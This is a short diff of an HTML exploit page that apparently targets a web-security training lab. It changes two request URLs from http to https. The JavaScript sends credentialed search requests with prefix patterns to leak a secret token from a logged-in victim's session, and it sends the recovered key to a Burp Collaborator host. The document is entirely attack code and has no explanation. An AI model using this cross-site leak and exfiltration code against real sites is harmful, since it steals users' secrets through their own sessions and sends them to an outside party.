--- a/csl3.html
+++ b/csl3.html
@@ -12,7 +12,7 @@
         console.log("sendKey:"+k)
         try {
             x = new XMLHttpRequest();
-            x.open("GET","http://qqkxpek9c8g1z17v3kas595rqiw8kx.burpcollaborator.net?key="+k, false);
+            x.open("GET","https://qqkxpek9c8g1z17v3kas595rqiw8kx.burpcollaborator.net?key="+k, false);
             x.send();
         } catch(e) {
                 console.log("BB"+e);
@@ -30,7 +30,7 @@
 
             try {
                 x = new XMLHttpRequest();
-                x.open("GET","http://ptl-ff8dcea2-d4247c35.libcurl.so/search?search=%5e"+tk, false);
+                x.open("GET","https://ptl-ff8dcea2-d4247c35.libcurl.so/search?search=%5e"+tk, false);
                 x.withCredentials = true;
                 x.send();
             }
